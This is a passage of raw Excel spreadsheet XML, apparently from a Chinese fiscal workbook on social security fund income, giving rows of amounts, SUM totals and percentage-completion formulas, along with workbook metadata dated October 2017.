      <c r="B5" s="8">
        <v>57043</v>
      </c>
      <c r="C5" s="8">
        <v>6927</v>
      </c>
      <c r="D5" s="8">
        <f t="shared" ref="D5:D14" si="0">C5/B5*100</f>
        <v>12.143470715074594</v>
      </c>
    </row>
    <row r="6" spans="1:4" ht="21.95" customHeight="1">
      <c r="A6" s="9" t="s">
        <v>82</v>
      </c>
      <c r="B6" s="8">
        <f>35959+13964</f>
        <v>49923</v>
      </c>
      <c r="C6" s="8">
        <v>13308</v>
      </c>
      <c r="D6" s="8">
        <f t="shared" si="0"/>
        <v>26.65705185986419</v>
      </c>
    </row>
    <row r="7" spans="1:4" ht="21.95" customHeight="1">
      <c r="A7" s="9" t="s">
        <v>83</v>
      </c>
      <c r="B7" s="8">
        <v>9918</v>
      </c>
      <c r="C7" s="8">
        <v>10874</v>
      </c>
      <c r="D7" s="8">
        <f t="shared" si="0"/>
        <v>109.63904012905827</v>
      </c>
    </row>
    <row r="8" spans="1:4" ht="21.95" customHeight="1">
      <c r="A8" s="9" t="s">
        <v>84</v>
      </c>
      <c r="B8" s="8">
        <v>6179</v>
      </c>
      <c r="C8" s="8">
        <v>42377</v>
      </c>
      <c r="D8" s="8">
        <f t="shared" si="0"/>
        <v>685.82294869720022</v>
      </c>
    </row>
    <row r="9" spans="1:4" ht="21.95" customHeight="1">
      <c r="A9" s="9" t="s">
        <v>85</v>
      </c>
      <c r="B9" s="8">
        <v>604</v>
      </c>
      <c r="C9" s="8">
        <v>309</v>
      </c>
      <c r="D9" s="8">
        <f t="shared" si="0"/>
        <v>51.158940397350996</v>
      </c>
    </row>
    <row r="10" spans="1:4" ht="21.95" customHeight="1">
      <c r="A10" s="9" t="s">
        <v>86</v>
      </c>
      <c r="B10" s="8">
        <v>506</v>
      </c>
      <c r="C10" s="8">
        <v>464</v>
      </c>
      <c r="D10" s="8">
        <f t="shared" si="0"/>
        <v>91.699604743083</v>
      </c>
    </row>
    <row r="11" spans="1:4" ht="21.95" customHeight="1">
      <c r="A11" s="9" t="s">
        <v>87</v>
      </c>
      <c r="B11" s="8">
        <v>222</v>
      </c>
      <c r="C11" s="8">
        <v>111</v>
      </c>
      <c r="D11" s="8">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
    </row>
    <row r="12" spans="1:4" ht="21.95" customHeight="1">
      <c r="A12" s="10" t="s">
        <v>88</v>
      </c>
      <c r="B12" s="8">
        <f>SUM(B4:B11)</f>
        <v>158773</v>
      </c>
      <c r="C12" s="8">
        <f>SUM(C4:C11)</f>
        <v>106989</v>
      </c>
      <c r="D12" s="8">
        <f t="shared" si="0"/>
        <v>67.384882820126847</v>
      </c>
    </row>
    <row r="13" spans="1:4" ht="21.95" customHeight="1">
      <c r="A13" s="10" t="s">
        <v>89</v>
      </c>
      <c r="B13" s="8">
        <v>59157</v>
      </c>
      <c r="C13" s="8">
        <v>59157</v>
      </c>
      <c r="D13" s="8">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
    </row>
    <row r="14" spans="1:4" ht="21.95" customHeight="1">
      <c r="A14" s="10" t="s">
        <v>88</v>
      </c>
      <c r="B14" s="8">
        <f>SUM(B12:B13)</f>
        <v>217930</v>
      </c>
      <c r="C14" s="8">
        <f>SUM(C12:C13)</f>
        <v>166146</v>
      </c>
      <c r="D14" s="8">
        <f t="shared" si="0"/>
        <v>76.238241637222956</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B2:D2"/>
    <mergeCell ref="A1:D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(m1)_(m2)_(m3)</vt:lpstr>
      <vt:lpstr>社保基金收入</vt:lpstr>
      <vt:lpstr>'(m1)_(m2)_(m3)'!Counter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2017-10-31T01:47:46Z</dcterms:modified>
</cp:coreProperties>
</file>